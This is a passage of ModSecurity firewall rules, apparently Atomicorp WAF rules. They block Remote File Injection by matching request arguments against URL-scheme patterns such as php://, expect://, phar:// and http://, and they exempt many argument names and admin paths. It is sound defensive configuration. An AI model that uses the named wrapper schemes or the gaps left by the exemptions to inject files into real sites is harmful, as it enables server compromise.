!ARGS:contents|!ARGS:PreviewImage|!ARGS:pagelink|!ARGS:pagefeed|!ARGS:ShopPath|!ARGS:content|!ARGS:right|!ARGS:left|!ARGS:/^myDevEditControl_/|!ARGS:/link/   "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule REQUEST_URI "!(pagemode=link_index|^/admin/index\.php\?fuse=admin)" "phase:2,chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340477,rev:30,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/admin/index.php exclude)',deny,log,auditlog,status:403"
SecRule ARGS|!ARGS:/ssl/|!ARGS:/catDesc/|!ARGS:/corvuspay/|!ARGS:/highslide/|!ARGS:config_name|!ARGS:config_owner|!ARGS:/^adjust/|!ARGS:/^go/|!ARGS:/ULTIMATUMControl/|!ARGS:/youtube/|!ARGS:/web/|!ARGS:u|!ARGS:logo|!ARGS:/popup/|!ARGS:feed|!ARGS:liketext|!ARGS:/img/|!ARGS:/^field_/|!ARGS:/ping/|!ARGS:/service/|!ARGS:pp_path|!ARGS:vidid|!ARGS:bic|!ARGS:/^field_id/|!ARGS:/^smeg_serv/|!ARGS:/twitter/|!ARGS:/gplus/|!ARGS:/facebook/|!ARGS:/instagram/|!ARGS:/pinterest/|!ARGS:/website/|!ARGS:/app_update/|!ARGS:/google/|!ARGS:cubecart4_path|!ARGS:osc_path|!ARGS:field_vals|!ARGS:events_map|!ARGS:xmlpath|!ARGS:homepage|!ARGS:input|!ARGS:email_contents|!ARGS:/link/|!ARGS:page_content|!ARGS:feed_copyright|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/image/|!ARGS:/page/|!ARGS:code|!ARGS:comments|!ARGS:/^opts/|!ARGS:text|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url|!ARGS:SitePath|!ARGS:Exlink|!ARGS:contents|!ARGS:PreviewImage|!ARGS:pagelink|!ARGS:pagefeed|!ARGS:ShopPath|!ARGS:content|!ARGS:right|!ARGS:left|!ARGS:/^myDevEditControl_/|!ARGS:/link/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" chain
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecMarker END_RULES_91058

SecRule REQUEST_FILENAME "/admincp/user\.php" "phase:2,id:91059,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165"
SecAction "phase:2,id:91060,t:none,pass,nolog,skipAfter:END_RULES_91060"

SecRule ARGS|!ARGS:/css/|!ARGS:site_details|!ARGS:/homepage/|!ARGS:/^userfield/|!ARGS:olduser|!ARGS:user[signature]|!ARGS:userfield[field10]|!ARGS:text|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,phase:2,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340478,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/forums/admincp/user.php)',deny,log,auditlog,status:403"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/css/|!ARGS:/homepage/|!ARGS:/^userfield/|!ARGS:olduser|!ARGS:user[signature]|!ARGS:userfield[field10]|!ARGS:text|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340479,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/forums/admincp/user.php)',deny,log,auditlog,status:403"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91060

SecRule REQUEST_FILENAME "/admincp/template\.php" "phase:2,id:91061,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91062,t:none,pass,nolog,skipAfter:END_RULES_91062"

SecRule ARGS|!ARGS:searchstring|!ARGS:template|!ARGS:olduser|!ARGS:user[signature]|!ARGS:userfield[field10]|!ARGS:text|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340482,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/forum/admincp/template.php)',deny,log,auditlog,status:403"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:searchstring|!ARGS:template|!ARGS:olduser|!ARGS:user[signature]|!ARGS:userfield[field10]|!ARGS:text|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340483,phase:2,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/forum/admincp/template.php)',deny,log,auditlog,status:403"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"



SecMarker END_RULES_91062

SecRule REQUEST_FILENAME "/contact\.php" "phase:2,id:91063,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91064,t:none,pass,nolog,skipAfter:END_RULES_91064"

SecRule ARGS|!ARGS:/domain/|!ARGS:fm_comments|!ARGS:contact_message|!ARGS:homepage|!ARGS:field4|!ARGS:Page|!ARGS:msg|!ARGS:comments|!ARGS:yourmessage|!ARGS:howhear|!ARGS:information|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/page/|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:/website/|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:/link/|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url|!ARGS:Message "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340484,phase:2,rev:8,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (contact.php)',deny,log,auditlog,status:403"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/domain/|!ARGS:fm_comments|!ARGS:contact_message|!ARGS:Page|!ARGS:msg|!ARGS:comments|!ARGS:yourmessage|!ARGS:howhear|!ARGS:information|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/page/|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:/website/|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:/link/|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url|!ARGS:Message "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340485,phase:2,rev:8,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (contact.php)',deny,log,auditlog,status:403"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"



SecMarker END_RULES_91064

SecRule REQUEST_FILENAME "/admin/conf\.php" "phase:2,id:91065,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91066,t:none,pass,nolog,skipAfter:END_RULES_91066"

SecRule ARGS|!ARGS:/^opts/|!ARGS:text|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340486,phase:2,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/admin/conf.php)',deny,log,auditlog,status:403"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/^opts/|!ARGS:text|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340487,phase:2,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/admin/conf.php)',deny,log,auditlog,status:403"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91066

SecRule REQUEST_FILENAME "/admin/posted/edit_listing\.php" "phase:2,id:91067,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91068,t:none,pass,nolog,skipAfter:END_RULES_91068"

SecRule ARGS|!ARGS:my_description|!ARGS:text|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340488,phase:2,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/admin/posted/edit_listing.php)',deny,log,auditlog,status:403"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:my_description|!ARGS:text|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340489,phase:2,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/admin/posted/edit_listing.php)',deny,log,auditlog,status:403"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"



SecMarker END_RULES_91068

SecRule REQUEST_FILENAME "/forums/private\.php" "phase:2,id:91069,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91070,t:none,pass,nolog,skipAfter:END_RULES_91070"

SecRule ARGS|!ARGS:message|!ARGS:text|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[